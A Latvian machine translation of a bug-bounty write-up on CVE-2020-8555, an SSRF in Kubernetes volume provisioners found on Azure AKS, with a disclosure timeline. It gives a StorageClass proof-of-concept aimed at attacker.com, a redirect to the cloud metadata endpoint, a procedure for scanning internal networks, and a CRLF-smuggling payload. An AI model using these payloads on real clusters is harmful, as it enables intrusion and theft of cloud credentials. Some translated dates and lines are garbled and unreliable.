🥇Kad runa nav tikai par ievainojamību Kubernetes...

Piezīme. tulk.: šī raksta autori detalizēti stāsta par to, kā viņiem izdevās atklāt ievainojamību CVE-2020-8555 in Kubernetes. Lai gan sākotnēji tas nešķita īpaši bīstams, kombinācijā ar citiem faktoriem tā kritiskums dažiem mākoņa pakalpojumu sniedzējiem izrādījās maksimālais. Vairākas organizācijas dāsni apbalvoja speciālistus par ieguldīto darbu.

Kas mēs esam

Mēs esam divi franču drošības pētnieki, kuri kopīgi atklāja ievainojamību Kubernetes. Mūsu vārdi ir Brice Augras un Christophe Hauquiert, bet daudzās Bug Bounty platformās mēs esam attiecīgi pazīstami kā Reeverzax un Hach:

Brice Augras Sākot no Uzņēmums Groupe Asten;
Kristofs Haukjers - Kubernetes arhitekts uzņēmumā Nokia.

Kas notika?

Šis raksts ir mūsu veids, kā pastāstīt, kā parasts pētniecības projekts negaidīti izvērtās par aizraujošāko piedzīvojumu kļūdu mednieku dzīvē (vismaz pagaidām).

Kā jūs droši vien zināt, kļūdu medniekiem ir dažas ievērojamas funkcijas:

viņi dzīvo no picas un alus;
viņi strādā, kad visi pārējie guļ.

Mēs neesam izņēmums no šiem noteikumiem: mēs parasti tiekamies nedēļas nogalēs un pavadām bezmiega naktis, uzlaužot. Taču viena no šīm naktīm beidzās ļoti neparasti.

Sākotnēji mēs plānojām tikties, lai pārrunātu dalību CTF nākošajā dienā. Sarunas laikā par Kubernetes drošību pārvaldītā servisa vidē atcerējāmies veco ideju par SSRF (Servera puses pieprasījuma viltošana) un nolēma mēģināt to izmantot kā uzbrukuma skriptu.

11:XNUMX mēs apsēdāmies, lai veiktu pētījumu un agri no rīta devāmies gulēt, ļoti apmierināti ar rezultātiem. Tieši šī pētījuma dēļ mēs saskārāmies ar MSRC Bug Bounty programmu un nonācām pie privilēģiju eskalācijas izmantošanas.

Pagāja vairākas nedēļas/mēneši, un mūsu negaidītais rezultāts bija viens no augstākajiem balvām Azure Cloud Bug Bounty vēsturē - papildus tai, ko saņēmām no Kubernetes!

Pamatojoties uz mūsu pētniecības projektu, Kubernetes produktu drošības komiteja publicēja CVE-2020-8555.

Tagad vēlos pēc iespējas plašāk izplatīt informāciju par atrasto ievainojamību. Mēs ceram, ka novērtēsiet atradumu un dalīsieties tehniskajā detaļā ar citiem infosec kopienas dalībniekiem!

Tātad, lūk, mūsu stāsts...

Konteksts

Lai pēc iespējas labāk saprastu notikušo, vispirms apskatīsim, kā Kubernetes darbojas mākoņa pārvaldītā vidē.

Kad šādā vidē izveidojat Kubernetes klasteru, par pārvaldības slāni parasti atbild mākoņpakalpojumu sniedzējs.

Kontroles slānis atrodas mākoņa nodrošinātāja perimetrā, savukārt Kubernetes mezgli atrodas klienta perimetrā

Lai dinamiski piešķirtu apjomus, tiek izmantots mehānisms, kas tos dinamiski nodrošina no ārējās krātuves aizmugursistēmas un salīdzina ar PVC (pastāvīga apjoma pretenzija, t.i., sējuma pieprasījums).

Tādējādi pēc tam, kad PVC ir izveidots un saistīts ar StorageClass K8s klasterī, turpmākās darbības, lai nodrošinātu skaļumu, pārņem kube/mākoņa kontrollera pārvaldnieks (tā precīzais nosaukums ir atkarīgs no izlaiduma). (Piezīme. tulk.: Mēs jau rakstījām vairāk par CCM, izmantojot tā ieviešanas piemēru vienam no mākoņpakalpojumu sniedzējiem šeit.)

Ir vairāki nodrošinātāju veidi, kurus atbalsta Kubernetes: lielākā daļa no tiem ir iekļauti orķestratora kodols, savukārt citus pārvalda papildu nodrošinātāji, kas ir ievietoti klastera apvidos.

Mūsu pētījumā mēs koncentrējāmies uz iekšējo apjoma nodrošināšanas mehānismu, kas ir parādīts zemāk:

Sējumu dinamiska nodrošināšana, izmantojot iebūvēto Kubernetes nodrošinātāju

Īsāk sakot, kad Kubernetes tiek izvietots pārvaldītā vidē, kontroliera pārvaldnieks ir mākoņpakalpojuma sniedzēja atbildība, bet apjoma izveides pieprasījums (numurs 3 diagrammā iepriekš) atstāj mākoņa nodrošinātāja iekšējo tīklu. Un šeit lietas kļūst patiešām interesantas!

Datorurķēšanas scenārijs

Šajā sadaļā mēs paskaidrosim, kā mēs izmantojām iepriekš minētās darbplūsmas priekšrocības un piekļuvām mākoņpakalpojumu sniedzēja iekšējiem resursiem. Tas arī parādīs, kā varat veikt noteiktas darbības, piemēram, iegūt iekšējos akreditācijas datus vai palielināt privilēģijas.

Viena vienkārša manipulācija (šajā gadījumā Service Side Request Forgery) palīdzēja iziet ārpus klienta vides, veidojot dažādu pakalpojumu sniedzēju klasterus pārvaldītajos K8.

Mūsu pētījumā mēs koncentrējāmies uz GlusterFS nodrošinātāju. Neskatoties uz to, ka šajā kontekstā ir aprakstīta turpmākā darbību secība, Quobyte, StorageOS un ScaleIO ir pakļauti vienai un tai pašai ievainojamībai.

Dinamiskā apjoma nodrošināšanas mehānisma ļaunprātīga izmantošana

Glabāšanas klases analīzes laikā GlusterFS Golang klienta pirmkodā mēs pamanījupirmajā HTTP pieprasījumā (3), kas nosūtīts sējuma izveides laikā, līdz parametra pielāgotā URL beigām resturl ir pievienots /volumes.

Mēs nolēmām atbrīvoties no šī papildu ceļa, pievienojot # parametrā resturl. Šī ir pirmā YAML konfigurācija, ko izmantojām, lai pārbaudītu daļēji aklu SSRF ievainojamību (jūs varat lasīt vairāk par daļēji aklu vai pusaklu SSRF, piemēram, šeit — apm. tulk.):

apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
  name: poc-ssrf
provisioner: kubernetes.io/glusterfs
parameters:
  resturl: "http://attacker.com:6666/#"
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: poc-ssrf
spec:
  accessModes:
  - ReadWriteOnce
  volumeMode: Filesystem
  resources:
    requests:
      storage: 8Gi
  storageClassName: poc-ssrf

Pēc tam mēs izmantojām bināro failu, lai attālināti pārvaldītu Kubernetes klasteru kubectl. Parasti mākoņa pakalpojumu sniedzēji (Azure, Google, AWS utt.) ļauj iegūt akreditācijas datus lietošanai šajā utilītprogrammā.

Pateicoties tam, es varēju izmantot savu “īpašo” failu. Kube-controller-manager izpildīja iegūto HTTP pieprasījumu:

kubectl create -f sc-poc.yaml

Atbilde no uzbrucēja viedokļa

Neilgi pēc tam mēs arī varējām saņemt HTTP atbildi no mērķa servera, izmantojot komandas describe pvc vai get events in kubectl. Un patiešām: šis noklusējuma Kubernetes draiveris savos brīdinājumos/kļūdu ziņojumos ir pārāk precīzs...

Šeit ir piemērs ar saiti uz https://www.google.friestatīt kā parametru resturl:

kubectl describe pvc poc-ssrf
# или же можете воспользоваться kubectl get events

Šajā pieejā mēs aprobežojāmies ar tādiem vaicājumiem kā HTTP POST un nevarēja iegūt atbildes pamatteksta saturu, ja atgriešanas kods bija 201. Tāpēc mēs nolēmām veikt papildu izpēti un paplašinājām šo uzlaušanas scenāriju ar jaunām pieejām.

Mūsu pētījuma attīstība

1. izvērstais scenārijs: 302. novirzīšanas izmantošana no ārēja servera, lai mainītu HTTP metodi, lai nodrošinātu elastīgāku iekšējo datu vākšanas veidu.
2. izvērstais scenārijs: automatizējiet LAN skenēšanu un iekšējo resursu atrašanu.
3. izvērsts scenārijs: HTTP CRLF + kontrabandas izmantošana (“pieprasījuma kontrabanda”), lai izveidotu pielāgotus HTTP pieprasījumus un izgūtu datus, kas iegūti no kube kontrollera žurnāliem.

Tehniskās specifikācijas

Pētījumā tika izmantots Azure Kubernetes pakalpojums (AKS) ar Kubernetes versiju 1.12 Ziemeļeiropas reģionā.
Iepriekš aprakstītie scenāriji tika izpildīti jaunākajos Kubernetes laidienos, izņemot trešo scenāriju, jo viņam vajadzēja Kubernetes, kas uzbūvēts ar Golang versiju ≤ 1.12.
Uzbrucēja ārējais serveris — https://attacker.com.

1. izvērstais scenārijs: HTTP POST pieprasījuma novirzīšana uz GET un sensitīvu datu saņemšana

Sākotnējā metode tika uzlabota ar uzbrucēja servera konfigurāciju, lai atgrieztos 302 HTTP Retcodelai pārvērstu POST pieprasījumu par GET pieprasījumu (diagrammas 4. darbība):

Pirmais pieprasījums (3) nāk no klienta GlusterFS (Controller Manager), ir POST tips. Veicot šīs darbības, mēs to varējām pārvērst par GET:

Kā parametrs resturl StorageClass tas ir norādīts http://attacker.com/redirect.php.
Beigu punkts https://attacker.com/redirect.php atbild ar 302 HTTP statusa kodu ar šādu atrašanās vietas galveni: http://169.254.169.254. Tas var būt jebkurš cits iekšējais resurss - šajā gadījumā novirzīšanas saite tiek izmantota tikai kā piemērs.
Pēc noklusējuma net/http bibliotēka Golang novirza pieprasījumu un pārvērš POST par GET ar statusa kodu 302, kā rezultātā tiek nosūtīts HTTP GET pieprasījums mērķa resursam.

Lai izlasītu HTTP atbildes pamattekstu, kas jums jādara describe PVC objekts:

kubectl describe pvc xxx

Šis ir HTTP atbildes piemērs JSON formātā, ko varējām saņemt:

Atrastās ievainojamības iespējas tajā laikā bija ierobežotas šādu punktu dēļ:

Nespēja ievietot HTTP galvenes izejošajā pieprasījumā.
Nespēja izpildīt POST pieprasījumu ar parametriem pamattekstā (tas ir ērti pieprasīt atslēgas vērtību no etcd instances, kas darbojas 2379 ports, ja tiek izmantots nešifrēts HTTP).
Nespēja izgūt atbildes pamatteksta saturu, ja statusa kods bija 200 un atbildei nebija JSON satura tipa.

2. izvērstais scenārijs: lokālā tīkla skenēšana

Pēc tam šī pusaklā SSRF metode tika izmantota, lai, pamatojoties uz atbildēm, skenētu mākoņpakalpojumu sniedzēja iekšējo tīklu un aptaujātu dažādus klausīšanās pakalpojumus (metadatu instance, Kubelet utt.). kube kontrolieris.

Vispirms tika noteikti Kubernetes komponentu standarta klausīšanās porti (8443, 10250, 10251 utt.), un pēc tam mums bija jāautomatizē skenēšanas process.

Redzot, ka šī resursu skenēšanas metode ir ļoti specifiska un nav saderīga ar klasiskajiem skeneriem un SSRF rīkiem, mēs nolēmām izveidot savus darbiniekus bash skriptā, kas automatizē visu procesu.

Piemēram, lai ātri skenētu iekšējā tīkla diapazonu 172.16.0.0/12, paralēli tika palaisti 15 darbinieki. Iepriekš minētais IP diapazons ir izvēlēts tikai kā piemērs un var tikt mainīts atkarībā no jūsu konkrētā pakalpojumu sniedzēja IP diapazona.

Lai skenētu vienu IP adresi un vienu portu, jums jāveic šādas darbības:

dzēst pēdējo pārbaudīto StorageClass;
noņemt iepriekšējo pārbaudīto pastāvīgo apjoma pretenziju;
mainiet IP un porta vērtības sc.yaml;
izveidot StorageClass ar jaunu IP un portu;
izveidot jaunu PVC;
izņemiet skenēšanas rezultātus, izmantojot PVC aprakstu.

3. izvērstais scenārijs: CRLF injekcija + HTTP kontrabanda Kubernetes klastera “vecajās” versijās

Ja papildus tam pakalpojumu sniedzējs klientiem piedāvāja vecās K8s klastera versijas и deva viņiem piekļuvi kube-controller-manager žurnāliem, efekts kļuva vēl nozīmīgāks.

Uzbrucējam patiešām ir daudz ērtāk mainīt HTTP pieprasījumus, kas paredzēti, lai pēc saviem ieskatiem iegūtu pilnu HTTP atbildi.

Lai īstenotu pēdējo scenāriju, bija jāizpilda šādi nosacījumi:

Lietotājam ir jābūt piekļuvei kube-controller-manager žurnāliem (kā, piemēram, Azure LogInsights).
Kubernetes klasterim ir jāizmanto Golang versija, kas ir vecāka par 1.12.

Mēs izvietojām lokālo vidi, kas simulēja komunikāciju starp GlusterFS Go klientu un viltotu mērķa serveri (mēs pagaidām atturēsimies no PoC publicēšanas).

Tika atrasts ievainojamība, kas ietekmē Golang versijas, kas ir vecākas par 1.12, un ļauj hakeriem veikt HTTP kontrabandas/CRLF uzbrukumus.

Apvienojot iepriekš aprakstīto pusaklo SSRF вместе ar to mēs varējām nosūtīt pieprasījumus pēc saviem ieskatiem, tostarp nomainīt galvenes, HTTP metodi, parametrus un datus, kurus pēc tam apstrādāja kube kontroliera pārvaldnieks.

Šeit ir parādīts parametrā strādājošas “ēsmas” piemērs resturl StorageClass, kas īsteno līdzīgu uzbrukuma scenāriju:

http://172.31.X.1:10255/healthz? HTTP/1.1rnConnection: keep-
alivernHost: 172.31.X.1:10255rnContent-Length: 1rnrn1rnGET /pods? HTTP/1.1rnHost: 172.31.X.1:10255rnrn

Rezultāts ir kļūda nevēlama atbilde, ziņojums par kuru tiek ierakstīts kontrollera žurnālos. Pateicoties pēc noklusējuma iespējotai daudzvārdībai, tur tiek saglabāts arī HTTP atbildes ziņojuma saturs.

Šī bija mūsu visefektīvākā “ēsma” koncepcijas pierādījuma ietvaros.

Izmantojot šo pieeju, mēs varējām veikt dažus no šiem uzbrukumiem dažādu pārvaldītu k8s nodrošinātāju klasteriem: privilēģiju eskalācija ar akreditācijas datiem metadatu gadījumos, galvenais DoS, izmantojot (nešifrētus) HTTP pieprasījumus etcd galvenajos gadījumos utt.

efekti

Kubernetes oficiālajā paziņojumā par mūsu atklāto SSRF ievainojamību tā tika novērtēta CVSS 6.3/10: CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N. Ja ņemam vērā tikai ievainojamību, kas saistīta ar Kubernetes perimetru, integritātes vektoru (integritātes vektors) tas kvalificējas kā neviens.

Tomēr, novērtējot iespējamās sekas pārvaldītas pakalpojumu vides kontekstā (un šī bija mūsu pētījuma visinteresantākā daļa!), mūs mudināja pārklasificēt ievainojamību par vērtējumu. Kritiskais CVSS10/10 daudziem izplatītājiem.

Tālāk ir sniegta papildu informācija, kas palīdzēs jums izprast mūsu apsvērumus, novērtējot iespējamo ietekmi mākoņa vidē.

Integritāte

Izpildiet komandas attālināti, izmantojot iegūtos iekšējos akreditācijas datus.
Iepriekš minētā scenārija reproducēšana, izmantojot metodi IDOR (nedroša tiešā objekta atsauce) ar citiem resursiem, kas atrodami vietējā tīklā.

Konfidencialitāte

Uzbrukuma veids Sānu kustība pateicoties mākoņa akreditācijas datu zādzībai (piemēram, metadatu API).
Informācijas vākšana, skenējot lokālo tīklu (nosakot SSH versiju, HTTP servera versiju, ...).
Apkopojiet informāciju par gadījumu un infrastruktūru, aptaujājot iekšējās API, piemēram, metadatu API (http://169.254.169.254,…).
Klientu datu zagšana, izmantojot mākoņa akreditācijas datus.

Pieejamība

Visi ekspluatācijas scenāriji, kas saistīti ar uzbrukuma vektoriem integritāte, var izmantot destruktīvām darbībām un novest pie tā, ka galvenās instances no klienta perimetra (vai jebkura cita) nav pieejamas.

Tā kā mēs atradāmies pārvaldītā K8 vidē un novērtējām ietekmi uz integritāti, varam iedomāties daudzus scenārijus, kas varētu ietekmēt pieejamību. Papildu piemēri ietver etcd datu bāzes sabojāšanu vai kritisku Kubernetes API izsaukumu.

Laika skala

6. gada 2019. decembris: MSRC Bug Bounty tika ziņots par ievainojamību.
3. gada 2020. janvāris: trešā puse informēja Kubernetes izstrādātājus, ka mēs strādājam pie drošības problēmas. Un lūdza viņus uzskatīt SSRF par iekšēju (iekšējo) ievainojamību. Pēc tam mēs sniedzām vispārīgu ziņojumu ar tehnisku informāciju par problēmas avotu.
15. gada 2020. janvāris: mēs nodrošinājām tehniskos un vispārīgos ziņojumus Kubernetes izstrādātājiem pēc viņu pieprasījuma (izmantojot platformu HackerOne).
15. gada 2020. janvāris: Kubernetes izstrādātāji mūs informēja, ka pusaklā SSRF + CRLF injekcija iepriekšējiem laidieniem tiek uzskatīta par galveno ievainojamību. Mēs nekavējoties pārtraucām citu pakalpojumu sniedzēju perimetru analīzi: K8s komanda tagad nodarbojās ar galveno cēloni.
15. gada 2020. janvāris: MSRC atlīdzība saņemta, izmantojot HackerOne.
16. gada 2020. janvāris: Kubernetes PSC (Produktu drošības komiteja) atzina ievainojamību un lūdza to paturēt noslēpumā līdz marta vidum, ņemot vērā lielo potenciālo upuru skaitu.
11. gada 2020. februāris: saņemta Google VRP atlīdzība.
4. gada 2020. marts: Kubernetes atlīdzība saņemta, izmantojot HackerOne.
15. gada 2020. marts: sākotnēji plānotā publiskošana tika atlikta Covid-19 situācijas dēļ.
1. gada 2020. jūnijs: Kubernetes un Microsoft kopīgs paziņojums par ievainojamību.

TL; DR

Dzeram alu un ēdam picu :)
Mēs atklājām Kubernetes iekšējo ievainojamību, lai gan mums nebija nodoma to darīt.
Mēs veicām papildu analīzi dažādu mākoņpakalpojumu sniedzēju klasteriem un varējām palielināt ievainojamības radīto kaitējumu, lai saņemtu papildu satriecošus bonusus.
Šajā rakstā jūs atradīsit daudz tehnisko informāciju. Mēs labprāt tos apspriestu ar jums (Twitter: @ReeverZax & @__hach_).
Izrādījās, ka visu veidu formalitāšu kārtošana un ziņošana prasīja daudz ilgāku laiku, nekā bija paredzēts.

atsauces

PS no tulka

Lasi arī mūsu emuārā:

Avots: www.habr.com

Ja runa nav tikai par Kubernetes ievainojamību...